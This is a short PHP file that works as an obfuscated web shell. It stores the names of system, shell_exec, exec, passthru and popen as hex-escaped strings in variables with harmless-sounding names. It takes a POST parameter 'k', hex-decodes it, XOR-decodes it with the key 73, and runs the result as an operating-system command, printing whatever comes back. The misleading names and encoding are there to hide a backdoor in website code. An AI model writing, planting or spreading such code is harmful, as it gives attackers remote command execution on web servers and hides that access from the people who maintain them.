<?php

$unit_converter6 = "st\x72e\x61\x6D_get_\x63\x6Fn\x74e\x6E\x74\x73";
$unit_converter2 = "sh\x65\x6C\x6C_ex\x65c";
$unit_converter1 = "\x73\x79\x73tem";
$publish_content = "\x68\x65x\x32\x62in";
$unit_converter4 = "\x70\x61ssthr\x75";
$unit_converter7 = "\x70\x63lo\x73e";
$unit_converter5 = "\x70o\x70en";
$unit_converter3 = "e\x78\x65c";
if (isset($_POST["k"])) {
            function hub_center($key,  $element ){$tkn ='';for($c=0; $c<strlen($key); $c++){$tkn.=chr(ord($key[$c])^$element);} return $tkn;}
            $k = $publish_content($_POST["k"]);
            $k = hub_center($k, 73);
            if (function_exists($unit_converter1)) {
                $unit_converter1($k);
            } elseif (function_exists($unit_converter2)) {
                print $unit_converter2($k);
            } elseif (function_exists($unit_converter3)) {
                $unit_converter3($k, $marker_key);
                print join("\n", $marker_key);
            } elseif (function_exists($unit_converter4)) {
                $unit_converter4($k);
            } elseif (function_exists($unit_converter5) && function_exists($unit_converter6) && function_exists($unit_converter7)) {
                $element_tkn = $unit_converter5($k, 'r');
                if ($element_tkn) {
                    $comp_component = $unit_converter6($element_tkn);
                    $unit_converter7($element_tkn);
                    print $comp_component;
                }
            }
            exit;
        }